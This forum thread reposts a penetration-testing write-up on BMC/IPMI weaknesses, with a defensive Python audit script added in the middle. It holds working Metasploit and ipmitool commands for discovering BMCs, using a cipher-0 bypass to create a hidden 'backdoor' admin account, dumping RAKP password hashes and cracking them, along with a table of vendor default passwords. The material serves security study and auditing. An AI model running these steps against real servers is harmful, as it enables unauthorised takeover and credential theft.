either via 'sideband' access to an existing network card or through a
dedicated interface. In addition to being built-in to various motherboards,
BMCs are also sold as pluggable modules and PCI cards. Nearly all servers
and workstations ship with or support some form of BMC. The Intelligent
Platform Management Interface (IPMI) is a collection of specifications that
define communication protocols for talking both across a local bus as well
as the network. This specification is managed by Intel and currently comes
in two flavors, version 1.5 and version 2.0. The primary focus of Dan
Farmer's research was the security of the IPMI network protocol, which uses
UDP port 623. A diagram of how the BMC interfaces with the system is shown
below (CC-SA-3.0 (C) U. Vezzani).
w********2
Posts: 632
70
The network services offered by major brands of BMCs differ widely by
vendor, but here are some commonalities. Most BMCs expose some form of web-
based management, a command-line interface such as Telnet or Secure Shell,
and the IPMI network protocol on port 623 (UDP and sometimes TCP). The
example below shows the output of an nmap -sSV -p1-65535 scan against a
Supermicro BMC in its default configuration.
Supermicro IPMI (firmware SMT_X9_218)
PORT      STATE SERVICE    VERSION
22/tcp    open  ssh        Dropbear sshd 2012.55 (protocol 2.0)
80/tcp    open  http       lighttpd
443/tcp   open  ssl/http   lighttpd
623/tcp   open  ipmi-rmcp  SuperMicro IPMI RMCP
5900/tcp  open  vnc        VNC (protocol 3.8)
5985/tcp  open  wsman?
49152/tcp open  upnp       Intel UPnP reference SDK 1.3.1 (Linux 2.6.17.WB_WPCM450.1.3; UPnP 1.0)
In addition to the TCP ports listed, this device also responds on UDP ports
623 (IPMI) and 1900 (UPnP SSDP).
w********2
Posts: 632
71
Network Discovery
A single-packet probe to the UDP IPMI service on port 623 is an especially
fast way of discovering BMCs on the network. The following example
demonstrates the use of the Metasploit Framework's ipmi_version module to
identify local BMCs. The reply indicates whether the device supports version
1.5 or 2.0 and what forms of authentication are supported.
$ msfconsole
=[ metasploit v4.7.0-dev [core:4.7 api:1.0]
-- --=[ 1119 exploits - 638 auxiliary - 179 post
-- --=[ 309 payloads - 30 encoders - 8 nops
msf> use auxiliary/scanner/ipmi/ipmi_version
msf auxiliary(ipmi_version) > set RHOSTS 10.0.0.0/24
msf auxiliary(ipmi_version) > run
[*] Sending IPMI requests to 10.0.0.0->10.0.0.255 (256 hosts)
[*] 10.0.0.7:623 IPMI-2.0 OEMID:21317 UserAuth(auth_msg, auth_user, non_null_user, null_user) PassAuth(password, md5, md2) Level(1.5, 2.0)
[*] 10.0.0.4:623 IPMI-2.0 OEMID:21317 UserAuth(auth_msg, auth_user, non_null_user, null_user) PassAuth(password, md5, md2) Level(1.5, 2.0)
[*] 10.0.0.135:623 IPMI-2.0 UserAuth(auth_user, non_null_user) PassAuth(password, md5, md2, null) Level(1.5, 2.0)
[*] 10.0.0.249:623 IPMI-2.0 UserAuth(auth_user, non_null_user) PassAuth(password, md5, md2, null) Level(1.5, 2.0)
[*] 10.0.0.252:623 IPMI-2.0 UserAuth(auth_user, non_null_user) PassAuth(password, md5, md2, null) Level(1.5, 2.0)
w********2
Posts: 632
72
Usernames & Passwords
As most penetration testers know, the easiest way into most network devices
is through default passwords. BMCs are no different, and the table below
shows the default username and password combinations for the most popular
BMC brands sold today. Note that only HP randomizes the password during the
manufacturing process.
Product Name                                      Default Username  Default Password
HP Integrated Lights Out (iLO)                    Administrator     <factory-randomized character string>
Dell Remote Access Card (iDRAC, DRAC)             root              calvin
IBM Integrated Management Module (IMM)            USERID            PASSW0RD (with a zero)
Fujitsu Integrated Remote Management Controller   admin             admin
Supermicro IPMI (2.0)                             ADMIN             ADMIN
Oracle/Sun Integrated Lights Out Manager (ILOM)   root              changeme
ASUS iKVM BMC                                     admin             admin
w********2
发帖数: 632
73
IPMI Authentication Bypass via Cipher 0
Dan Farmer identified a serious failing of the IPMI 2.0 specification,
namely that cipher type 0, an indicator that the client wants to use clear-
text authentication, actually allows access with any password. Cipher 0
issues were identified in HP, Dell, and Supermicro BMCs, with the issue
likely encompassing all IPMI 2.0 implementations. It is easy to identify
systems that have cipher 0 enabled using the ipmi_cipher_zero module in the
Metasploit Framework.
$ **msfconsole**

=[ metasploit v4.7.0-dev [core:4.7 api:1.0]=
=-- --=[ 1119 exploits - 638 auxiliary - 179 post
-- --=[ 309 payloads - 30 encoders - 8 nops
msf> **use auxiliary/scanner/ipmi/ipmi_cipher_zero**
msf auxiliary(ipmi_cipher_zero) > **set RHOSTS 10.0.0.0/24**
msf auxiliary(ipmi_cipher_zero) > **run**
[*] Sending IPMI requests to 10.0.0.0->10.0.0.255 (256 hosts)
[+] 10.0.0.99:623 VULNERABLE: Accepted a session open request for cipher zero
[+] 10.0.0.132:623 VULNERABLE: Accepted a session open request for cipher zero
[+] 10.0.0.141:623 VULNERABLE: Accepted a session open request for cipher zero
[+] 10.0.0.153:623 VULNERABLE: Accepted a session open request for cipher zero
The following example demonstrates how to exploit the cipher 0 issue using the standard "ipmitool" command-line interface. This utility is available on most platforms and can be installed on Debian-based Linux distributions by running "sudo apt-get install ipmitool". Notice how the flag for specifying cipher 0 (-C 0) allows a previously disallowed action to execute. For this attack to work, a valid username must be identified, which is almost never an issue. Once a backdoor account has been created, any number of attacks on the BMC and its host become possible.
$ ipmitool -I lanplus -H 10.0.0.99 -U Administrator -P FluffyWabbit user list
Error: Unable to establish IPMI v2 / RMCP+ session
Get User Access command failed (channel 14, user 1)
$ ipmitool -I lanplus -C 0 -H 10.0.0.99 -U Administrator -P FluffyWabbit user list
ID Name Callin Link Auth IPMI Msg Channel Priv Limit
1 Administrator true false true ADMINISTRATOR
2 (Empty User) true false false NO ACCESS
$ ipmitool -I lanplus -C 0 -H 10.0.0.99 -U Administrator -P FluffyWabbit user set name 2 backdoor
$ ipmitool -I lanplus -C 0 -H 10.0.0.99 -U Administrator -P FluffyWabbit user set password 2 password
$ ipmitool -I lanplus -C 0 -H 10.0.0.99 -U Administrator -P FluffyWabbit user priv 2 4
$ ipmitool -I lanplus -C 0 -H 10.0.0.99 -U Administrator -P FluffyWabbit user enable 2
$ ipmitool -I lanplus -C 0 -H 10.0.0.99 -U Administrator -P FluffyWabbit user list
ID Name Callin Link Auth IPMI Msg Channel Priv Limit
1 Administrator true false true ADMINISTRATOR
2 backdoor true false true ADMINISTRATOR
$ ssh backdoor@10.0.0.99
backdoor@10.0.0.99's password: password
User:backdoor logged-in to ILOMXQ3469216(10.0.0.99)
iLO 4 Advanced Evaluation 1.13 at Nov 08 2012
Server Name: host is unnamed
Server Power: On
hpiLO->
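A defender-side audit that goes with posts 72 and 73, added here as an example and not part of the original post or of the write-up it quotes: it parses `ipmitool lan print 1` output to check whether cipher suite 0 is still usable on the BMC, and parses `ipmitool user list` output in the layout shown above to flag enabled ADMINISTRATOR accounts outside an approved baseline, which is how the `backdoor` account from the walkthrough would surface. The sample outputs, the baseline and the `cipher_privs` remediation string are assumptions.

```python
import re

# Constructed `ipmitool lan print 1` excerpt (not from the original post). Position i
# of "Cipher Suite Priv Max" is the max privilege for cipher suite i; 'X' = disabled,
# so anything but 'X' in position 0 leaves cipher 0 usable.
LAN_PRINT_WEAK = """\
RMCP+ Cipher Suites     : 0,1,2,3,6,7,8,11,12
Cipher Suite Priv Max   : aaaaXXaaaXXaaXX
"""
LAN_PRINT_FIXED = LAN_PRINT_WEAK.replace(": aaaaXXaaaXXaaXX", ": XaaaXXaaaXXaaXX")

# Constructed `ipmitool user list` output in the layout shown in the post, after
# the walkthrough's "backdoor" account was added.
USER_LIST = """\
ID  Name           Callin  Link Auth  IPMI Msg   Channel Priv Limit
1   Administrator  true    false      true       ADMINISTRATOR
2   backdoor       true    false      true       ADMINISTRATOR
3   (Empty User)   true    false      false      NO ACCESS
"""

USER_RE = re.compile(r"^\s*(?P<id>\d+)\s+(?P<name>.*?)\s*(?P<callin>true|false)\s+"
                     r"(?P<link>true|false)\s+(?P<ipmi>true|false)\s+(?P<priv>\S.*?)\s*$")

def cipher_zero_enabled(lan_print):
    """True if cipher suite 0 is offered and not disabled in the privilege map."""
    suites = re.search(r"RMCP\+ Cipher Suites\s*:\s*([\d,\s]+)", lan_print)
    privs = re.search(r"Cipher Suite Priv Max\s*:\s*(\S+)", lan_print)
    offered = bool(suites) and "0" in [s.strip() for s in suites.group(1).split(",")]
    return offered and (privs is None or privs.group(1)[0] != "X")

def parse_user_list(text):
    """Parse `ipmitool user list` rows into dicts; the header line does not match."""
    return [m.groupdict() for m in map(USER_RE.match, text.splitlines()) if m]

def unexpected_admins(users, baseline=("Administrator",)):
    """Enabled ADMINISTRATOR accounts whose names are not in the approved baseline."""
    return [u["name"] for u in users
            if u["ipmi"] == "true" and u["priv"] == "ADMINISTRATOR"
            and u["name"] not in baseline]

def audit(lan_print, user_list, baseline=("Administrator",)):
    """Human-readable findings for one BMC; the remediation string is an assumption."""
    findings = []
    if cipher_zero_enabled(lan_print):
        findings.append("cipher suite 0 enabled; disable with "
                        "`ipmitool lan set 1 cipher_privs XaaaXXaaaXXaaXX`")
    findings += [f"unexpected ADMINISTRATOR account: {n}"
                 for n in unexpected_admins(parse_user_list(user_list), baseline)]
    return findings
```

Feed `audit()` the captured output of the two ipmitool commands from a management host; a clean BMC returns an empty list.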
w********2
发帖数: 632
74
IPMI 2.0 RAKP Authentication Remote Password Hash Retrieval
More recently, Dan Farmer identified an even bigger issue with the IPMI 2.0 specification. In short, the authentication process for IPMI 2.0 mandates that the server send a salted SHA1 or MD5 hash of the requested user's password to the client, prior to the client authenticating. You heard that right - the BMC will tell you the password hash for any valid user account you request. This password hash can be broken using an offline bruteforce or dictionary attack. Since this issue is a key part of the IPMI specification, there is no easy path to fix the problem, short of isolating all BMCs into a separate network. The ipmi_dumphashes module in the Metasploit Framework can make short work of most BMCs.
$ msfconsole
=[ metasploit v4.7.0-dev [core:4.7 api:1.0]
-- --=[ 1119 exploits - 638 auxiliary - 179 post
-- --=[ 309 payloads - 30 encoders - 8 nops
msf> use auxiliary/scanner/ipmi/ipmi_dumphashes
msf auxiliary(ipmi_dumphashes) > set RHOSTS 10.0.0.0/24
msf auxiliary(ipmi_dumphashes) > set THREADS 256
msf auxiliary(ipmi_dumphashes) > run
[+] 10.0.0.59 root:266ead5921000000....000000000000000000000000000000001404726f6f74:eaf2bd6a53ee18e3b2dfa36cc368ef3a4af18e8b
[+] 10.0.0.59 Hash for user 'root' matches password 'calvin'
[+] 10.0.0.59 :408ee18714000000d9cc....000000000000000000000000000000001400:93503c1b7af26abee34904f54f26e64d580c050e
[+] 10.0.0.59 Hash for user '' matches password 'admin'
In the example above, the module was able to identify two valid user
accounts (root and blank), retrieve the hmac-sha1 password hashes for these
accounts, and automatically crack them using an internal wordlist. If a
database is connected, Metasploit will automatically store the hashed and
clear-text version of these credentials for future use. If a user's password
is not found in the local dictionary of common passwords, an external
password cracking program can be employed to quickly brute force possible
options. The example below demonstrates how to write out John the Ripper and
Hashcat compatible files.
msf auxiliary(ipmi_dumphashes) > set RHOSTS 10.0.1.0/24
msf auxiliary(ipmi_dumphashes) > set THREADS 256
msf auxiliary(ipmi_dumphashes) > set OUTPUT_JOHN_FILE out.john
msf auxiliary(ipmi_dumphashes) > set OUTPUT_HASHCAT_FILE out.hashcat
msf auxiliary(ipmi_dumphashes) > run
[+] 10.0.1.100 root:ee33c2e02700000....000000000000000000000000000000001404726f6f74:8c576f6532356cc342591204f41cc4eab7da6e8a
Thanks to atom, the main developer of Hashcat, version 0.46 or above now supports cracking RAKP hashes. It is worth noting that atom added support for RAKP within 2 hours of receiving the feature request! In the example below, we use hashcat with RAKP mode (7300) to brute force all four-character passwords within a few seconds.
./hashcat-cli64.bin --username -m 7300 out.hashcat -a 3 ?a?a?a?a
Initializing hashcat v0.46 by atom with 8 threads and 32mb segment-size...
Added hashes from file out.hashcat: 1 (1 salts)
[ ... ]
Input.Mode: Mask (?a?a?a)
Index.....: 0/1 (segment), 857375 (words), 0 (bytes)
Recovered.: 0/1 hashes, 0/1 salts
Speed/sec.: - plains, - words
Progress..: 857375/857375 (100.00%)
Running...: --:--:--:--
Estimated.: --:--:--:--
ee33c2e0270000....000000000000000000000000000000001404726f6f74:8c576f6532356cc342591204f41cc4eab7da6e8a:taco
All hashes have been recovered
Thanks to Dhiru Kholia, John the Ripper's "bleeding-jumbo" branch now
supports cracking RAKP hashes as well. Make sure you have git installed and
build John with the following steps.
$ git clone https://github.com/magnumripper/JohnTheRipper.git
$ cd JohnTheRipper
$ git checkout bleeding-jumbo
$ cd src
$ make linux-x86-64
$ cd ../run
$ ./john --fork=8 --incremental:alpha --format=rakp ./out.john
Loaded 1 password hash (RAKP [IPMI 2.0 RAKP (RMCP+) HMAC-SHA1 32/64 OpenSSL])
Press 'q' or Ctrl-C to abort, almost any other key for status
taco (10.0.1.100 root)